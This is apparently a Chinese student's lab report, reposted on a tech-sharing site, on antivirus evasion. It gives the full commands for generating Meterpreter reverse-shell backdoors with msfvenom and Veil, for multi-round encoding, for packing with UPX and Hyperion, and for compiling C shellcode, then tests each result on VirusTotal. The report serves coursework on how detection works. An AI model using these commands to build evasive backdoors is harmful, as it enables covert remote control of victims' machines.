ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

2019-2020-2 20175105王鑫浩《网络对抗技术》Exp3 免杀原理与实践

2020-04-04 09:04:08  阅读:291  来源: 互联网

标签:exe 免杀 Exp3 恶意代码 如下 20175105 2019 veil virustotal


2019-2020-2 20175105王鑫浩《网络对抗技术》Exp3 免杀原理与实践

实验步骤

1.正确使用msf编码器

1.输入如下的代码,生成exp3.exe文件,对后门程序进行编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.159.1 LPORT=5105 -f exe > exp3.exe
结果如下:

virustotal检测结果如下:

2.输入如下代码,生成met-encoded1.exe文件,相比上一条指令多了-i 10,意思是编码十次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 10 LHOST=192.168.159.1 LPORT=5105 -f exe > exp3_encoded10.exe
结果如下:

virustotal检测结果如下:

2.msfvenom生成如其他类型文件

(1)生成jar文件
生成命令如下:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.159.1 LPORT=5105 f jar > 20175105_java_backdoor.jar
结果如下:

用virustotal检测结果如下:

(2)生成jsp文件
生成命令如下:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.159.1 LPORT=5105 x> 20175105_jsp.jsp
结果如下:

用virustotal检测结果如下:

3.veil

(1)veil安装
参考kali201703安装Veil Evasion解决Veil—Evasion安装中git clone导致失败的问题,成功安装好veil
(2)输入veil指令,进入如下页面

(3)使用veil生成后门程序
使用use 7命令或use c/meterpreter/rev_tcp.py命令,使用此种payload

使用set LHOST 192.168.159.1set LPORT 5105来设置本地的IP地址和端口号
输入generate生成

(5)用virustotal检测结果如下:

4.加壳工具

(1)使用upx压缩壳
使用upx 20175105_veil_backdoor.exe -o 20175105_veil_backdoor_upx.exe命令加密刚才veil生成的程序

用virustotal检测结果如下:

(2)使用Hyperion加密壳
<2.1>查找hyperion.exe路径

<2.2>进入管理员模式,通过cp 20175105_veil_backdoor_upx.exe /usr/share/windows-resources/hyperion将刚才经过upx压缩的后门放到含有hyperion的文件夹下

<2.3>然后进入到上述目录中,输入wine hyperion.exe -v 20175105_veil_backdoor_upx.exe 20175105_veil_backdoor_upx_hyperion.exe命令用hyperion加密后门程序
<2.4>用virustotal检测结果如下:

5.使用C + shellcode编程

(1)使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.1 LPORT=5105 -f c > callshellcode.c 命令生成一段shellcode到callshellcode.c
(2)打开callshellcode.c,添加代码如下:

int main()
{
   int (*func)() = (int(*)())buf;
   func();

}


(3)使用i686-w64-mingw32-g++ callshellcode.c -o 20175105_backdoor.exe将c文件变成一个可执行程序。
(4)用virustotal检测结果如下:

6.使用其他课堂未介绍方法

(1)打开veil,输入use evasion,输入list查看payload列表,输入use 16尝试第16项go/meterpreter/rev_tcp

(2)设置本地IP地址、本地端口号后生成可执行程序
(3)virustotal检测结果如下:


问题回答

1.杀软是如何检测出恶意代码的?
基于特征码的检测:经过对许多恶意代码的分析,统筹出该类恶意代码经常出现的一段或多段代码,而且是其他正常程序没有的,称为该类恶意代码的特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。

​ 基于行为的恶意软件检测:可以理解为加入了行为监控的启发式。通过对恶意代码的观察研究,发现有一些行为是恶意代码共同的比较特殊的行为,杀软会监视程序的运行,如果发现了这些特殊行为,就会认为其是恶意软件。

2.免杀是做什么?
对恶意软件做处理,让它不被杀毒软件所检测。

3.免杀的基本方法有哪些?
改变特征码的技术:加壳、使用encode进行编码、基于payload重新编译生成可执行文件、使用其他语言重写再编译
改变行为的技术: 尽量使用反弹式连接,使用隧道技术,加密通讯数据;基于内存操作,减少对系统修改,加入混淆作用的正常功能代码
非常规技术:使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中;使用社工类攻击,诱骗目标关闭AV软件;纯手工制作恶意软件

4.开启杀软能绝对防止电脑中恶意代码吗?
不能,通过本次实验查阅的相关资料,证明杀软的病毒库是不断更新的,这也能证明,恶意代码也是在不断发展。


实验体会

本次实验相较前两次实验在知识面上扩展了许多,导致自己有些应接不暇,自己应该调整时间分配,在下次实验中表现得更好一些。

标签:exe,免杀,Exp3,恶意代码,如下,20175105,2019,veil,virustotal
来源: https://www.cnblogs.com/wxhblogs/p/12630282.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有